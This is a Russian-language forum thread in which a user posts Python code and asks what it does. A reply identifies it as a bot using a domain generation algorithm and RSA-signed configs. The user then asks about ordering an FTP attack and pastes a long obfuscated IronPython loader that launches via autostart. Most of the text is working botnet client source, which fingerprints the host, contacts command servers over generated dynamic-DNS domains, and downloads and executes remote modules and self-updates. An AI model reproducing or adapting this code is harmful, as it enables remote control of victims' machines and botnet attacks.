Подскажите что делает код (python)

Discussion in 'Песочница' started by traceme, 16 Sep 2015.

  1. traceme

    traceme Member

    Joined:
    11 Jun 2015
    Messages:
    34
    Likes Received:
    11
    Reputations:
    1
    Подскажите пожалуйста что делает этот код
    Code:
    import ctypes
from ctypes import wintypes
import subprocess
from base64 import b64encode,b64decode
import threading
import traceback
import hashlib
import zipfile
import urllib2
import inspect
import urllib
import socket
import shutil
import ctypes
import random
import _winreg as winreg
import types
import json
import time
import rsa
import sys
import re
import os
_CreateMutex=ctypes.windll.kernel32.CreateMutexA
_CreateMutex.argtypes=[wintypes.LPCVOID,wintypes.BOOL,wintypes.LPCSTR]
_CreateMutex.restype=wintypes.HANDLE
_GetLastError=ctypes.windll.kernel32.GetLastError
_GetLastError.argtypes=[]
_GetLastError.restype=wintypes.HANDLE
class singleinstance:
def __init__(self):self.mutexname='multivar_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}';self.mutex=_CreateMutex(None,False,self.mutexname);self.lasterror=_GetLastError()
def aleradyrunning(self):return self.lasterror==183
def __del__(self):
  if self.mutex:_CloseHandle(self.mutex)
def chk_mutex():
mutex=singleinstance();time.sleep(1)
if mutex.aleradyrunning():sys.exit()
class Http:
def __init__(self,proxy=False,cookie_support=False,ua=False):
  self.handlers=set()
  if proxy:self.handlers|=set([urllib2.ProxyHandler({'http':proxy}),urllib2.HTTPBasicAuthHandler()])
  if cookie_support:self.handlers|=set([urllib2.HTTPCookieProcessor()])
  if self.handlers:self.interface=urllib2.build_opener(*self.handlers)
  else:self.interface=urllib2.build_opener(urllib2.BaseHandler)
  urllib2.install_opener(self.interface)
  if not ua:ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'
  self.interface.addheaders=[('User-agent',ua)]
def prepare_request(self,url,post=False,referer=False):
  request=urllib2.Request(url)
  if referer:request.add_header('Referer',referer)
  return request
class Web:
def __init__(self,proxy=False,cookie_support=False,ua=False,timeout=60):self.timeout=timeout;self.web=Http(proxy,cookie_support,ua)
def fetch(self,url,data=False,referer=False):
  request=self.web.prepare_request(url,referer)
  if data:data=urllib.urlencode(data);response=self.web.interface.open(request,data,timeout=self.timeout)
  else:response=self.web.interface.open(request,timeout=self.timeout)
  return response
class requests:
class texter:
  def __init__(self,text):self.text=text
@staticmethod
def post(url,data=False,proxies=False,headers=False):
  if not proxies:proxies={'http':False}
  if not headers:headers={'User-Agent':False}
  resp=Web(proxy=proxies['http'],ua=headers['User-Agent']).fetch(url,data);return requests.texter(resp.read())
@staticmethod
def get(url,proxies=False,headers=False):return requests.post(url,proxies=proxies,headers=headers)
def file_put_contents(fname,data):
with open(fname,'wb') as f:f.write(data)
def file_get_contents(fname):
with open(fname,'rb') as f:return f.read()
def extract_text(text,tag1,tag2):
match=re.search('{}(.*?){}'.format(tag1,tag2),text,re.M|re.S)
if match is None:return ''
return match.group(1)
def get_hard_id():
try:k=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SOFTWARE\\Microsoft\\Cryptography');return winreg.QueryValueEx(k,'MachineGuid')[0].lower()
except Exception as e:print(e);return os.popen('vol '+'c:','r').read().split()[-1].lower()
def set_cur_dir(name):os.chdir(name)
def get_script_dir():return os.path.dirname(os.path.realpath(__file__))
def get_pseudo():
alpha='qwertyuiopasdfghjklzxcvbnm1234567890';pseudo=''
for i in range(9):pseudo=pseudo+random.choice(alpha)
return pseudo
def chk_sign(text):
result=False
try:public_data='LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JSUJDZ0tDQVFFQXZPbTlNeHg4RG5VbHZWNHdCOW93NUlPa3BNTzN1R2ZqTDE2aXlzdFRSVGMwQ3NQU2lFR00KMEJCUVlqY0wzSStORE9tMjhxLzBVWGVsMHFwdmtGQ0N6Y0FUVXJsOVlvUHpzbkpURnBGaUdYclArTi9IQzczZgpKV1pERWJCUW84L0ZVb1MvWW1oVTFXbkFjMzhVNUg1eFhqY0J0SkhWOHhmT0tmL2V5S1hKdmlFU0h6VHBVa2pTClJ6TDVTb2ZwZ3p0VU00cWc0NGFBOEF6blJSazlpcmp3VjErVHRhRzRQOXpFZ2JoZThOM0grOS9rT2pCK1dYOE8KNHlUbDhPdUVuNEV4Yy9TdysxcmFaL2x3QnFsUWlGdDFEUk05U2ZpU2lrNkJoSndBUnVpbmk0R3RjV3h3UDdROQpiM1dKL1JRdUZxQ0hSMVkzN0F0YlVLc1NzQjV5b0hyTDJRSURBUUFCCi0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K';public_data=b64decode(public_data);pubkey=rsa.PublicKey.load_pkcs1(public_data.encode());sign=extract_text(text,'<sign>','</sign>');sign=sign.decode('hex');data=extract_text(text,'<data>','</data>');data=b64decode(data);result=rsa.verify(data,sign,pubkey)
except Exception as e:result=False
return result
def wait_for_internet():
is_internet=False
while not is_internet:
  try:sock=socket.create_connection(('google.com',80),timeout=30);is_internet=True;sock.close()
  except Exception as e:print(e);time.sleep(2)
def import_code(code,name):module=types.ModuleType(name);exec(code,module.__dict__);return module
def get_serv_data():
random.seed(538479483);domains=['.net','.ru','.com','.in.ua','.ucoz.com','.ucoz.net','.ucoz.org','.ucoz.ru','.ucoz.ua','.ucoz.co.uk','.at.ua','.3dn.ru','.my1.ru','.clan.su','.moy.su','.do.am','.narod.ru','.3utilities.com','.bounceme.net','.ddns.net','.ddnsking.com','.gotdns.ch','.hopto.org','.myftp.biz','.myftp.org','.myvnc.com','.no-ip.biz','.no-ip.info','.no-ip.org','.noip.me','.redirectme.net','.servebeer.com','.serveblog.net','.servecounterstrike.com','.serveftp.com','.servegame.com','.servehalflife.com','.servehttp.com','.serveminecraft.net','.servemp3.com','.servepics.com','.servequake.com','.sytes.net','.webhop.me','.zapto.org'];wait_for_internet();rsa_config='';loop=True;iterator=0
while loop:
  sub_domain=get_pseudo()
  for e in domains:
   domain=sub_domain+e;url='http://%s/%s.txt'%(domain,sub_domain);print('check url %s'%url);time.sleep(.1);text=do_request(url,domain)
   if chk_sign(text):rsa_config=text;loop=False;break
  iterator+=1
  if iterator>=100:iterator=0;random.seed(538479483)
  time.sleep(2)
rsa_config=extract_text(text,'<data>','</data>');rsa_config=b64decode(rsa_config);print(rsa_config);main_config=extract_text(rsa_config,'<main>','</main>');ip=extract_text(main_config,'<ip>','</ip>');host=extract_text(main_config,'<host>','</host>');path=extract_text(main_config,'<path>','</path>');return rsa_config,ip,host,path
def do_request(url,ip,data=False):
try:
  proxy={'http':ip}
  if data:return requests.post(url,proxies=proxy,data=data).text
  return requests.get(url,proxies=proxy).text
except Exception:return ''
alive_modules={}
def run_new_module(rsa_config,code,name):imported=import_code(code,name);alive_modules[name]=imported;thread=threading.Thread(target=imported.payload,args=(alive_modules[name],rsa_config));thread.start();return thread
def stop_thread(module):alive_modules[module['name']].exit();module['thread'].join()
def setup_import(imp):
try:print(imp['name']);__import__(imp['name']);return
except Exception as e:print(str(e))
try:
  zip_s=requests.get(imp['url']).text
  with open(imp['name']+'.zip','wb') as f:f.write(zip_s)
  try:shutil.rmtree(imp['name'])
  except Exception as e:print(e)
  with zipfile.ZipFile(imp['name']+'.zip','r') as myzip:myzip.extractall()
  set_cur_dir(get_script_dir()+'\\'+imp['name']);os.popen('"'+sys.executable+'" '+'-X:FullFrames setup.py install');set_cur_dir(get_script_dir())
except Exception as e:return False
return True
def main():
time.sleep(10);chk_mutex();rsa_config='';set_cur_dir(get_script_dir());bot_id=get_hard_id();print('jmscbcsrkvureutlepd',bot_id);rsa_config,adminka_ip,adminka_host,adminka_path=get_serv_data();loaded_modules={}
while True:
  post_data={}
  for k in loaded_modules:post_data[k]=loaded_modules[k]['hash']
  req_url='http://%s%s?h=%s&k=%s&do=get_modules'%(adminka_host,adminka_path,'jmscbcsrkvureutlepd',bot_id);print(post_data);resp=do_request(req_url,adminka_ip,data={'modules':json.dumps(post_data)});sleep=extract_text(resp,'<sleep>','</sleep>')
  if not sleep:sleep='7200'
  exception_text=''
  try:
   modules_head=extract_text(resp,'<py_head>','</py_head>')
   if modules_head:modules_head=json.loads(modules_head)
   else:modules_head=[]
   modules_codes=extract_text(resp,'<modules>','</modules>');update_code=extract_text(resp,'<update>','</update>')
   if update_code:print('Updating..');cur_script=os.path.realpath(__file__);code=b64decode(update_code);file_put_contents(cur_script,code);print('run ',[sys.executable,cur_script]);subprocess.Popen([sys.executable,cur_script],creationflags=8);sys.exit()
   for module in modules_head:
    print(module['name'])
    if module['name'] in loaded_modules:print('trying kill module '+module['name']);stop_thread(loaded_modules[module['name']]);loaded_modules.pop(module['name']);print('killed module '+module['name'])
    print('update imports');imports_result=True
    for imp in module['imports']:
     if not setup_import(imp):exception_text=exception_text+"I can't install "+imp['name']+'\n';imports_result=False;continue
    if not imports_result:continue
    print('load module');module_code=extract_text(modules_codes,'<'+module['name']+'>','</'+module['name']+'>');module_code=b64decode(module_code);module_thread=0
    if module['load_mode']=='thread':print('load module as thread');module_thread=run_new_module(rsa_config,module_code,module['name'])
    loaded_modules[module['name']]=module;loaded_modules[module['name']]['thread']=module_thread
  except Exception as e:exception_text=exception_text+traceback.format_exc()
  if len(exception_text)!=0:
   try:exception_text+='\n\n['+resp+']'
   except Exception as e:pass
   req_url='http://%s%s?h=%s&k=%s&do=traceback'%(adminka_host,adminka_path,'jmscbcsrkvureutlepd',bot_id);do_request(req_url,adminka_ip,data={'trace':exception_text})
  try:time.sleep(int(sleep))
  except Exception as e:time.sleep(7200)
if __name__=='__main__':main()
     
    #1 traceme, 16 Sep 2015
  2. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Выглядит как бот с DGA и ассиметричным шифрованием
     
    _________________________
    #2 Kaimi, 16 Sep 2015
    traceme likes this.
  3. traceme

    traceme Member

    Joined:
    11 Jun 2015
    Messages:
    34
    Likes Received:
    11
    Reputations:
    1
    Спасибо! Если вам не сложно, подскажите, допустим если этот скрипт запущен от имени администратора на win системе - возможно ли хозяину ботнета послать команду на атаку фтп сервера?
    Вот сам скрипт, изначально на ironpython , с обфускацией, запускается через автозагрузку
    Code:
    import base64
jdetiggavomna = ("063e5b1d14463854222f294201282505091d06181109521c2e352a4002312806150c301409302504071e360e0e581a00162c071f3d2a293b063e5b1d14463854222029433d1e251008583819115726233d1c2e06053a28032f2d3c08250236150527561e08593c453b23225a293532053e5b53012c260a0d250235193e27291f302d233e13335a1f05412e402e2138051518240c312f0b073e07171908323403110a3a0f033a2e183e5b3c032f223c1628050b0607375e100e29341a2b3c2507053508192404061e15324b1d0f2b2544052825040b3d0e193109071c04355d09032a285b15180a170a3f2e0b271d0b1d092d4f0c16272918051c2a073d3e245a35181e10082f5e0b0033255809070e061333222306255507055a205a3f3d3c12325a131e0031171908323403110a3a0f04400c41032e061935181e10082f5e0b003325030e221a02283c262306255507055a205a3f3d380c090535040621171908323403110a3a0f3f410000050720062c0c300c0811254105275210303d153e13335a1f05412e402e21385f1532241e28050b0607375e100e2934041156521d241f0804042e5313123630540a3f561e271d0b1d092d4f0c162729110440213b063e5b1d14463854222029470707171908323403110a3a0f041f313b063e5b1d14463854222f5e08271c5e2d0907201d16233d26032a361c022d5b00123d1e1331302a0700420b1c302d0e063e091f04041f511c052d27133a1e3c1d313f21423e2556580e2d204123351b0e36412e1c3e313806222d2454313000073d282d070e221a02283c2651304100000507385f1532241e27031f2335413d39393f27061656071d033a08073d31271f271e4b343f2b1f41052752590f323419111d5e2532372a24312f200e35194b200805311a003731270e32241917275e113d2a2a4002312806262d1614090635470737311326011e37260f392535231416355b3c5a2232341e0f2d310b071d5e103a3d3845173c2904040b5143063e5f01143205110a5a310b061d311a27103f0020563d583335220a032c3c1315184b1d28045e3a3e28352433323845203c211105412d053e312004123d1e1331302a4b33415722325a121916211300044136360407201c151c471d31302942012825053a321205100a395d0435320a2b020228221e202939391718063721130913340f13335e06053532000507245a2f22470e313c08392d373505300334132a56071d062a36163f1002102c220a09203c17083e271f042607474416233d5c051f22043d3d5a04142d24170f2f0b403d282d0f0f5a270220300c59283736372b3d015e38202710252c0c052a09562a245a2c363e30032d290829093613242d270f3c272430571c2b432905082d2f00103c3d583d2a03493f5924132c223454313d56430037315d212f430310093e1b351f2203045b3f191547241731015206002835050f2d431d10333e1828412a1c052e331f1432341e0f2f310b071d5e103a3c4f3d283c39253e2a2a403531201314463b0b203908153e373104232d3006283c21003d3a0809033e5f1f1722470a2020291e06373e1925043c19162c3d11051b260a3d3e12073a180a0c085b351e071e2d1f0900464c3f300c12241b261b3d3e330d2e444b0f313f1f143c090f13303d0e18393004232e3126003d0028102c220a09270556430037315d25064f31102352123d270c18050438192c261a1e313f1f1f281d56580e2d204139351b033d253d173e5b02182e4743550f2f31462f330c5f29033401163c39040236550a063e5f0414322414090629423d275203303911053d57391805253105045b12062c2d330b263b0c392d370b04232d474416233d5c2b1f22033d3120022c3d1e1d0f3f52070527520721291d43115707122b1f324406313b053d24020e092f2108070925200e2224023d03040f3d35321d2e2f530c172247140f2e5e142f382905082d2f06112c211e023a0f4935042c1915472717325a5e0405420b0532593844112c291e041c354935042c19154727170f3f224b361d211a095823053d03040f2e3a2a1c052e331f17323411312f1f1e071e2a5009582045392700232e3126003d00281d15184b500e3c17083e271f0426071e1d1009391b3d2a2e0a012d5b102c2d230b3c5b310b06371f1933003f00272c211e023a08393e3e5f011432241d2020141c0538355909291543112c211e023a08492c3a125b15180a170a3f2e0b281b0f3c3c2c34362b3c25183e422241032e02232f22470f092f310b2f330b0d213b19123b2307052e352a06055b1e1a2c234b1e0f30250506432d59250438191023321d063522053d2e1206151b3c5c3b30291e00330f0b0e323c06102307012a1b5139312f383b27474b120a5a0b1e31382d1f3358200f115652112c3108142c38050d3f321e092220291e06373e1c0b2d300028231304041c2946045b3c192c1c47140906351e071d3d013358234c163c211b053508192a005f0312221e17312e5e040737311c30323f1a390a250405353d05062e2c1f2c320a0808062a022719260e303d0e0f28301b123d251c1d2b04061f1232241d310521183e24565809070e06133322112b1f2e41063e12012e474b13313f521e07190f5809070e06133322112b192e18045b3c232f22470f092f310b2f21080e2322200c102313183e182d05063e5f1012323417092e5e040737311c30323f1a11563d1b3d1b5100050738061518280c325a32022719260e0b3d2f12100952582e3a321828073c022626162a095b170206371f01261023003f272a07314008053d2e5359150f01033d3c141532420b1c302d4f46111d2927313125412b032f5d3f322411273e31262b0925100e00190d3e0e001d2a3150082c3a28222c223c1609115f0b2934265d272e15023f0e2a5c2e373e0004043c071446151226115305281a22072903371211563d1b3d1b5100050738061518280c325a32073d2735020b2d201d28233d11040855122c2a0e3c1547241d273f211c3e27525920130e442b37070c241b261b3d3e330d153d3808082f210b3e265e1030323044283c25582c3a2a1c052e3319122d381727202504074336503807300611563e1b041f321d3d312006151f4323323f1f083e230c5f2903371211093d100325320a032d5b5b15180a170a3f2e0b281c2d050932201911573a07032a2e032c38050d3f321e0922202d1e3e1d311030323f4311093d100325320a032a5f022c3220020a2f311a3e3731102129122628333104041f32092d1012132c2228080805310b2f21080e23223c19162c3d11051b26093d312c5b2c2d3c54280529013d282913232c12192b0e04232e35361c3d00280c2e471e110a3035143c090f13303d0e183e2c291105410c45373c3002143d3c08272f290406421319303c4f0f163c291f05412e40373c3002143d3c082720311a34253d01082238193e2c39180525320603313b53381f33142406291e06373e1c0e2d1a012833525903365540063e5b0614462454245b291e06373e1c0e58201c22310358033a251f0421201c133d1917325a5e0405420b0532593844112c291e041c3503033e2f1a351c300f313f3e153e1d31593358111a11563d1b3d1b1c4104041d192c323454323c56353d271f1330390e0c28333104041f3209373c3002143d3c08203c08392d33251030323044283c2558372a2a1c052e331f1247240d2706250b3e2825010907201311093d100325320a032a025b151805170805311f3e282d0509031d3e3b2729183d1b261b3e3138023918200c0f2f224b00282d1a082d1a1c3e0a3d11053532053e5b53012c261a0f3230351a2f2413103032380210565e123d26550a3d3e12073a1b160832015202061e350509072c1d2b563e1d0541261c050002132c2d345531302942283735010e2d33061623071c3d255d41032d5b102c220a09270635020627311f0e322705310d2a0f3d251c0a3d3d1a132c2d3c13095a52083e245613303d0e183e0a0f043e1b5100050738061518280c325a32070643250508031e0c283c2d593d2a2a402b21381a142224120f30364b0742311a3003434513335a04054132402c38050d3f3d38080f20310b061925103032380210565e123d23141a052e2c10150c301d313021433e2829590910193e3b23251b3e2a2a0a2e213806133d2008080208392d332502303d2f122a555218051f08403f5852051547241731011f423e280f59213e060f283313052b1c361c02213b53123224500f29081535382959333224052b565a0403350c063d28050d2c32240922202504074336060e323c063e2339000335214935042c191547271708202d0401370b05091047322b3313123d211c1f3d3e2c012c2d381e3b3d3d1a06382905213e193e3b2729183d1b2605055a3b0d153d38120e2f0b1e070a171e09074f4113333d12372a171e0621385a153611523905210107423150290337121333320f051f5d402e2e02062f22200808062a4405373101302d200c111e5a5f2d43320a3d31231e272216080906361c2b1b3d01082238191435040f2e3a2e1c045a2b532047240d2020250b06430f5c3a32340c105703183d2a2a122d5b025a123d330a333b1f433d245606303d301e283c2112300b0026045b3c133a20340a313f52422e41571926072c19162325072c3a3209052a12012f2d200c203c130b3e2835580907421211093d100325320a0321271f123224500f2f310b2f382d050959370011093d003d3103002c38050d273d3c54323035023d4256050e2d1e032825040f3d35321d2e2e0e0612361a550805100107382d1f0f2d1a19111e5a2f3e251c0a3d3a12052c22340f31302d0834253d010822381939301b113d2a364104045e0d1518241c0f3f310800382a1c092d4f0f16270359041f13030421201c13321e0808125605071d5e5d0b3d200f3e2303043e25361c040727531732240c312f310b07090c22302d20183b2331180535321604213c5a2e473c120906351e061e3513212d2c002b335a042b353618032e2f1a39121d030f5a0b420533251f092d20003923311d3e25551c2b2a0e592f1c1114222f21082d373e5f30034346110907583d210c1b3e3138023d24020f313f3e153e1d0b1a303c4f1b283c390e3e405d05032e3c1f123d3f0b3105521a06273219250d19121656075806312606042e3c1f3d322811323f561e28330310330315053b232d122e353d4604043c5a122d3811222f3e07071d310130291105310939043d1b261c022138132f223c54335b351e013836060e2d2041162713583e2507082b2138022c0f3b14240f0815062721593358114c11093e1d04403218040424053d3616530d3b00072f1a5f190f59461b3e09311e041f5518032a025a2f22111c2720351a3e0a2e1926222419172c3a1b041f3105333112132c2647302039081505273e0e083d30452b560c0f062a29173304531f2c21021d31303543071d530e2013153e3b2c2104033a32090500281e2f2d200e0a2b521c071d5e580929110d39351b033d253d173d5b3c5a2e471a0c0805351405273606213e193e3b2c39110226140237310e1a141b3808311152220737311c39582040392c0f18051c2e1c3d105f232545243e33581f2235402124325a473723540322331931032d58243a2419203c3a3e2d343c361f270b3d380c1057251e3d1c36133f2c2413132d3054095a030b3d2825060f3915053d572104033a3209050028591722471d313f04073128310509041a222b3313593d2732442c2e19193c45430c325a0f02061d31210e3d1a1e381d070a2a345405052e53592c2d3b0b203908153e280f03303234453b213d5c3e403207032e061c141c300c0811251e2b1e25100b3d434539233e1828412e1c03213c13141c301208115205064325050803111b1609521b2e3107022d5b275c3c0c050a08010402281e2d05333d271a39375e1204351c00032a0d1a210c421c333b52010643030509031105310939043d1b260a3d31380c2f46241d335a350207190f1c333d471939301b1e040b511a062e381a151c1a11323f561e2f211702303d2f1228563d583f412a1a0404061d12334b0f0a302e1d2f2417103032244411095f0f05412905042e2c5a1736470f0a302d073d275605212d4f0f3e0a29000335030504043c02143d300c0f2f001d3c415e040b3d0e192a5553182c23141b3d3e330d2c472454335b25083e283102081311053d03040f3e251c07062e2f533c46345731302d42012831190859341d115639053d400c01065b125c13323c563205520629242e13242e23473c1e0c5d2a31074704212406122220123b3b041c2719250408593f1213372918051b26093e3e5f042c261551203c170507423158302d4e4c112c2504032536062c5a200214182012093b521805375e193358231a2b33131f06352100240028132c2d205508055315073829050e3d2403310939043d1b261a062e1e0c15471e0a09010f423e280f59213e193e3b2c210404413203032d5b2d2f220a1e3139081500382d5c250434442b0913183e435d1b3e313802262616293e12254230362a113b5b3c2328211b3d06272e24313d282c2c4424233d03292736271f2c393f204520080f3c2a3a363d3213285a2747011c38042924371b3508272224302732312f351e22293005280320320a2b313d0f1c2a362d21243c2c1c21221b3033190c1b3659533239213c2b3d3f1f233d24292a3e062443260e2d3b2a1e1408312c382c3b18343d09201719361c2d3d3c01123b16552e12331e22262a04122d231f331338585634371b293f3c070e0d2530295b021e2a24032c533924211e543f3f171d01351f5f3b062c2d2055311233270c37035b381e12301636262d53403324252e3c3c2c2c210a2538311f1c42313c021d13183816082e3121061b2d21333c201e2533251b362a2e25063d0620232d020e0e04171c0735133e2732343327080f2336433228282d38273b3302333202213c001c0331273d4f22242131313e1f103706025b5c1733282b3d3f040a3e253d06093c1d02210e293c06400c2833590205142323130f2f563f291c3e583f10301a2156391c05373e262a2e0d58201e1a273d05220b0736352d082f19472421393f31352d0930070e0b3b4633133d043205293729313310343a2054312b334232372904201925193c0c0e051f053d42561e275b2c04203c213f34342e1f32071a3923204b3d082d3d13291b171f3d06241a26545b1f3d412e2032130613203138133a58140a3e360b39383e1e39260f031b31252e35062f2801202328553f0331252a360b5c253c241e173c255c3e4055373e3c1d1313313c3609033d083226031a38582430200f3d3e06082541313d200b1533271d09202d3d0540171f3f58431e23083d1d311c2619053e191d231f3c370a043e080534293f382d242626552d1f062754083d2c1e273b200237312e31130136221e0b2c383b24091f5e331826372a2f0619201e0a0e263d52443127173e243d3f02132c073d3537142332583c392719243239032936052425593e2c3b021622213e2927323a35021a3f23233c273e3e3d24371b563d3c3f471b271e293f30191c242a213827230f30282112130500272d1a0b3d381328232d583e265519290338012c223c12312f321d07383100082d1a1f2a56390003352100285a285b2f1806080e3c560b0742221c3f22201c10230702344032452b04121c2f222002082f1318070a22060922201c102307023f403618032e2f1f2c22470e095a351e2f330c192559380528565f513d2a0c4004042c0012334b5431300f422f3835050f222706381e131206250005370009193c0f0512085a0b1c061a5307213e020f13330f1d372a2a003d5b5e1f2c32240e095a351e2f3303063032111b39301f033e2a3618373e3c5e123d380c325b35140037315d0e291e45283c03582b3107483d2e2c5a2f21460a272b044a284235010e2d335e381d005f3d3522403e3d5b03381f200f313f29043e373206302d30452b37005f041f320a033e125a262d381e323b52403e282d1930041d1a28232d583e211c0a063e0e1f3a3d30553205131e01230c22232d20412b563d1f03312636022e2406153d2014095a53153d282a0e303e060c283c2559053a354935042c191547272f22202d1e003831100803340c283c2559053a353b3d2e3c073f3d160c0a3035143e1d5e1032581a0016233d11051f32402c2a015c351c301408595e02061e35050907431916205a2f3e251c0a3d38050d12471a14092f3215061d5e59232d1a0f2a56071d0335320905043c5a39121d032220350b0124171308583807223c251e3e40101c032a5f001518240c0f2f31143d425e1c0807201f1623071e051b031f2d5b0e1c14471617313b521806425707262e1102393713580625551c055a3c5a26213f13203c130207415e190804241911095e040336552504073c0639463c12325a14073d421f1f0958231a3935040f2e3532443e5b3c1d123630220e2f291e07383519085842122b3c260f3d2614070404061f12361a08203c1342052756052604380628333d1f2c362d00240438062c1c301409302504071e350f33584f1e283703020540361c2b2e5f0214222714240556043e38311a303e4745173c2904040b513e055b385b143224310e30251e2f375201083d23053d563d5c3d25291f3e5b53012c260a10095a35430637321c325b4f1e133325583f435c00285a2006123d241d0901250606423558082d233e28233d052e35001c032f53102c2d3856335a351a00372206213e193e3b2c2100051f3606053a5f102c22240f202c32082b34365a253e27413f1d005f3d355d043e3e061f150f4306211152073e28360726291500110a3e062b3107053e5b531e3c0c050a27050b07281e31012013011b3e0a3d0205410b053e5b531e3c0c050a270631180643081c08072045381d1c062b1c321a055a051f1446380a2111101c281e310308591900110a3e062b310705033e241c131c4755323b04012e09525833584f433e09251e2b1c32022d101d043a1834542706311a2e0910072600381e100d5e11032107032d105f1e132137110806321c2833041c33580e1d100d5e12032107032d105f1e14461911085b321c2833041c302d4e002b335b062b31070505042c13144723110806321c2833041c27592045133313180335081c04105f001447420a272b04073d1d5e580807381910333e1d051f32402d101d043a18200f09062a07061d31592013011b3e093903051c2a02063e5f043a183c12093b04012e0952070859241e100a261d3e40031e2b2a091f17324b130f2f5f0706432d072013011b3e095a5d3d1c36072b04201a131c11172111520601273d5909294303110908062b3107050531065814183f11325a5e062e091007260743033e33071f2b1f2e00020009193c0c4711091156020733521908072c03381d1c062b1f51062b3e061d3a184b1d311104012e09521c08581a023e095a042d0b131e2b0720062c321e1d313f29420627321c08072045381d1c062b1c2a1c040730062f18240808015218064257072629150011563d11031f3219052e53043a1847080f2b04012e09521330323c472833251e032551403d312010123d38140a5a32073d425e1d2013011b3e0a2504041c3e1c3d07381d3a183c12093b04012e09521330323c4728330f00052531053e5b531e3c0c050a2706291e071e3d050b2d3006280913183d1f31053e5b531e3c0c050a2706291e071e3d050b22244511275e020540541e2b2a091f1547241d0f0531060527520533593c1d280a3a1d051f32402d101d043a1b3c0808063d1e06282613260738031037081b2d0b510a3d3120582c2d3014325b2a073d425e1d2013011b3e0a2504041c3e1c04313c0217472711325a5e062e0910072604384016233d122b1f511c032a09193c0c4757313f2d1d0643261c083d231b3e27081d021f2207032e521f1446380a21595745004221190e2c4f181057210e062551403d31201f2c2d230b203c130b0742210f33584f00280907063721071e285b121c1446335d3d202d433e2413190e2d200c2b3c391e041854072400285917321e17313b250106425e1e250d19123b2c25593e1e5d1b055b5b021722465d315a31423c4325133032201e101d0c18241b25173d0453133f3227030a3f53153e375e1d333d1a00111e04232e3125173d2e531e2f221e113b3029433d1c5e020858471d13335f1a3d26104104041d533c471a540f20264428095f0509134e19111d5e58023a351e2d3a02011447430c0a3f5301074331003258240310332d18051b0f470421201a141b230b215a291d3e27291b2322200c10272a04040b071c033120193d2106540a3f561e281e291a303d200239275f102c2610403d31025a26222012335b2d1e072831050959271a163c211b2b353606053e2c1a141c192f222b261505273e0e33581e072a5725183d40501f032e3c5e123619520806291a3c42291f08072c05281e5a583d2a0c40285b121c1446335d390521010742325e33043c192b3318232e312600032e3c132f2d20120801144b2921080e232d1a183b2307583d2a2e18032e5313261f421c262c26440528350509073045105722512a3610093e3e5f0114474211085a311e3e330058271011453c1e00582836290024002b0d12321e10313b5208063731050929110c3935040f041c2a183f5b241c141828143112561e01383510333d38452a573904023a351f032e3c5e1236050a3b2f351a003722422013011b222752033e2a36183700091a3946381e323e5e18064252040b3d154c2b0e32583d35321a055b38063d3d381e323e5e18064252040b3d15053d572911062551402c2120102f234b0e095a521f052704192558471d13335e0e3e405d053d040604262224500f202d1a3d43350f0e2d204116270311044022163e5b531f2c181e0a272b044a062721190800421b3e2708502b405518063e5e413c0c19530a30264b3e280f590907301f162252583d2a0c402c2e5b0217224702325a5e073e1d0b072629154d133c2a432d0b131e372a531a1531460a203c131d064329593a3d2041162c21003e413616032e3c5e12361a10323f0b073c42291f08072c05281d1c0637350c06045a3b413c0c050a3b2b5e1d064329593a0315053d572900033503493d31025a1518340e0f2e5e423e280f59212d471d13335e0e3e405d053d0406043a36115c082f2142053453072629154d3e5729000335035b2d10015d151824540f302d072d382d13333c4f1f10565e050625070306312b1917324b1e0f2b1f053d28350629072419280d290305435d093d312c5b2c2d3c542020310b06331f1909290e1e2b3c390037273e18052124063d211d2f2220350b01240822232934021109525c022655472d5b025a123d330a24050b050221080e232d1a183b2339000335214604043c5a122d381122202d1e072831050959240f3e0a291e0441351f033120193a3d301d095b0f023e282a5009223c03172c001b3d3522403e3d5b012f2d200c203b52423e280f592903371211093d58032a2e052e212006152d2408085b3508281d03050e291e4411091c1b043a2e06022e0606150f431308055e4601230c1c0e2d20411625040f3d2a0c1a3d31285a3f302450325a310500370b1f0800060c283c3959041f50172d1009212f220a140f05311406275e020e3d0e19111e5a5f0123141b3d3e330d151b2411335a521e00415e1d0858244410233e07041c2a183f5b241c1418281431111f1806423505262d431d10333e18281f0804042e53131232240f3b3f0b0607375e100e2c4f1f105639042c352a063d2e3f1914183410313b0c453d271f190e0720131033520303251c1c04581e1f2f224308333c56020628251f0904241928201f58063a2e1c3e3e3b5312321a1d313f2119052752072606241a11093d003d310c403e3120042c2d235d0a3f560506432d59303d270011232d5d05355d183d2a12021518161e3b3b0f1a06370b5b303c4f01105639590535320a305b5f021422240027202d083d265e0308584318133308182c261040062120062f222311085b351a071e3606213e020c283c3959041f5017032e02132c22340f2805351e3e1925130e2d4f022a573907041f32183d2a021e14472055092f32022b1d211a0b322c192a565a1e3d3a32033d31240814224b0f0f3f1f1e3309031c333d471938555a0c2b1f324406313b053d210610095a35430637310b2059241a11093d003d3100142b041a1c1722460b203917193e273e0e09582045163c290e06255507055a205a3d321e10082b0c442719255909041d43112c2118051c351f063e5b1d210c1611323f561e2e415719255b4f1313335a1f05412e403f585205172243133c1103073d275605205b46053d572104033a3209050e050d2c2d1a0e313025422d35315d335820021623071e051b261804102806391b301d0a3f52422f38295909031e19393700232e3a3609023d05213f3630520a302514070a561030323044283c2558040b511e3d313b05172243133c110343071d100732391d0016233d5c03330b172e210e1a12321503095b251e06190f190832341738565e000525311e3f3a19043a1b0214082b04012e43030020131d122b3c260f3d18141d2b070e13172d20082020170207365e13213b19123b2c39110226140a06213c5a1722051108055642071d3105212d1a0111221806051f22043d3a0e0e3d241d03222f31463d42311e0e29343317232504043a3600055b5e0d2f2d3f03313c1705071d0b1c0e291e193935040f2e3a0000032e0d0d13181e1331050b013e2352080b323432133313042c350804042f190414183410313b03162f09041c0f071a02381d1c06041b07002e2e2c103f3243510e050b052b1d565c0f071a023e093d5c033a2e183e5a38021432050b203908152d3829050e2c4f1f163c210e3d3508092c2e0e0612334b1e325b2d020738350f302d1a0c3927001a2d431c132d101e1a142d3006215a521a0627320732391d421057261d04355d073d3e5e053c0c3b0a205b2947070952050f2d201f163c39003e1f1c1c2c1009033f3611162111562b2b1b3d58082d0e321